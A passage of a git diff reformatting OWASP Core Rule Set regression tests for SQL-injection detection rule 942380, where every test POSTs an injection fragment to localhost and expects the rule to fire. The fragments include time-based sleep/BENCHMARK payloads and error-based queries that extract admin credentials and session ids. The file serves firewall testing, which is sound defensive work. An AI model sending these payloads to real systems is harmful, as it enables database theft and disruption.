127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from%28select%28sleep%2820%29%29%29a%29--+%26data%5BJob%5D%5Blimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-29 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: 
POST - port: 80 - uri: "/post" - data: "from%28select%28sleep%2820%29%29%29a%29%26data%5BJob%5D%5Blimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-30 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "FROM+ack_variable+WHERE+name%3D%22cron_last%22%3B%26sql_delimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-31 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute node_" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-32 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute scald" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-33 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute system" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-34 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - 
User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute user_" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-35 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute views" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-36 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute patha" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-37 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute workb" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-38 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute panel" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-39 - desc: "SQL Injection Attack" - stages: - - stage: - input: - 
dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=from+information_schema.tables+where+1%3D2+limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-40 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=FROM%2B%2560oxattribute%2560%2BWHERE%2BCONVERT%2528%2560oxattribute%2560.%2560OXID%2560%2BUSING%2Butf8%2529%2B%253D%2B%2527n550a1cee455b9ce585343d75d112b77%2527%2BLIMIT" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-41 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=FROM%28select+count%28%2A%29%2Cconcat%28%28select+%28select+concat%28session_id%29%29+FROM+jml_session+LIMIT" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-42 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=SELECT+dDJq+WHERE+9896%3D9896%3BSELECT+%28CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-43 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - 
headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=FROM+%60we_tblErrorLog%60+WHERE+%60we_tblErrorLog%60.%60ID%60+%3D+25251+LIMIT" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-44 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=FROM+%60dates%60+order+by+%60uname%60%2C+%60date%60%2C+%60load%60%26dummy%3D%60uname%60%26dummy%3D%60datum%60%26dummy%3D%60laden%60%26sql_delimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-45 + - test_id: 1 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from `db_miwf`.`sys_refindex` limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 2 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from(select count(*),concat((select (select (select concat(0x53,0x65,0x61,0x72,0x63,0x68,0x43,0x6F,0x6C,0x6C,0x65,0x63,0x74,0x6F,0x72) from `information_schema`.tables limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 3 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + 
Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from `information_schema`.tables limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 4 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "ORder by" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 5 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "ordeR by" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 6 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 7 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=FROM+termine+GROUP+BY+tag1%26sql_delimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 8 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: 
localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT 6229 FROM(SELECT COUNT(*),CONCAT(0x717a786a71,(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 9 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT CHAR(113)+CHAR(122)+CHAR(120)+CHAR(106)+CHAR(113)+(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 10 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 11 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT CONCAT(0x717a786a71,(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 12 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT 
(CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113))||(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 13 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 14 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT 'qzxjq'||(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 15 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute php" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 16 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user desc limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 17 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP 
CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "Execute(" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 18 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from+information_schema.tables+where+BINARY+LEFT%28table_name%2C+1%29+%3D+%27nnn%27+LIMIT" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 19 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from+information_schema.tables+where+table_schema%3Ddatabase%28%29+and+table_name+REGEXP+0x6d656d6265727324+limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 20 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "fromtype%3DvBForum%3ASocialGroupMessage%26do%3Dprocess%26contenttypeid%3D5%26categoryid%5B%5D%3D-99%29+union+select+salt+from+user+where+userid%3D1+and+row%281%2C1%29%3E%28select+count%28%2A%29%2Cconcat%28+%28select+user.salt%29+%2C0x3a%2Cfloor%28rand%280%29%2A2%29%29+x+from+%28select+1+union+select+2+union+select+3%29a+group+by+x+limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 21 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 
127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from%2F%2A%2A%2F%28select%2F%2A%2A%2Fcount%28%2A%29%2Cconcat%28floor%28rand%280%29%2A2%29%2C0x3a%2C%28select%2F%2A%2A%2Fconcat%28user%2C0x3a%2Cpassword%29%2F%2A%2A%2Ffrom%2F%2A%2A%2Fpwn_base_admin%2F%2A%2A%2Flimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 22 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "HAVING+1%3D" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 23 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute+elysi" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 24 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%283419%3D3419%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29%26limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 25 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + 
User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%289184%3D9184%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29+AND+%27%25%27%3D%27%26limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 26 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from%28select%28sleep%2820%29%29%29a%29%27%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 27 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from%28select%28sleep%2820%29%29%29a%29%2B%27%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 28 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from%28select%28sleep%2820%29%29%29a%29--+%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 29 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from%28select%28sleep%2820%29%29%29a%29%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 30 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "FROM+ack_variable+WHERE+name%3D%22cron_last%22%3B%26sql_delimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 31 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute node_" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 32 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute scald" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 33 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute system" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 34 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: 
localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute user_" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 35 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute views" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 36 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute patha" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 37 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute workb" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 38 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute panel" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 39 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + 
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=from+information_schema.tables+where+1%3D2+limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 40 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=FROM%2B%2560oxattribute%2560%2BWHERE%2BCONVERT%2528%2560oxattribute%2560.%2560OXID%2560%2BUSING%2Butf8%2529%2B%253D%2B%2527n550a1cee455b9ce585343d75d112b77%2527%2BLIMIT" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 41 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=FROM%28select+count%28%2A%29%2Cconcat%28%28select+%28select+concat%28session_id%29%29+FROM+jml_session+LIMIT" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 42 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=SELECT+dDJq+WHERE+9896%3D9896%3BSELECT+%28CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 43 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=FROM+%60we_tblErrorLog%60+WHERE+%60we_tblErrorLog%60.%60ID%60+%3D+25251+LIMIT"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942380"
+ - test_id: 44
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=FROM+%60dates%60+order+by+%60uname%60%2C+%60date%60%2C+%60load%60%26dummy%3D%60uname%60%26dummy%3D%60datum%60%26dummy%3D%60laden%60%26sql_delimit"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942380"
+ - test_id: 45
 desc: "SQL Injection Attack: EXISTS"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "pay=IF%20EXISTS%20(SELECT%20*%20FROM%20users%20WHERE%20username%20%3D%20'root')%20BENCHMARK(1000000000%2CMD5(1))"
- version: HTTP/1.0
- output:
- log_contains: id "942380"
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=IF%20EXISTS%20(SELECT%20*%20FROM%20users%20WHERE%20username%20%3D%20'root')%20BENCHMARK(1000000000%2CMD5(1))"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942380"
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml
index 62e8200bf..b90d64dd2 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml
@@ -2,22 +2,19 @@ meta:
 author: "Christian S.J. Peron, azurit"
 description: None
- enabled: true
- name: 942390.yaml
 tests:
- - test_title: 942390-1
+ - test_id: 1
 desc: "SQL Injection Attack"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
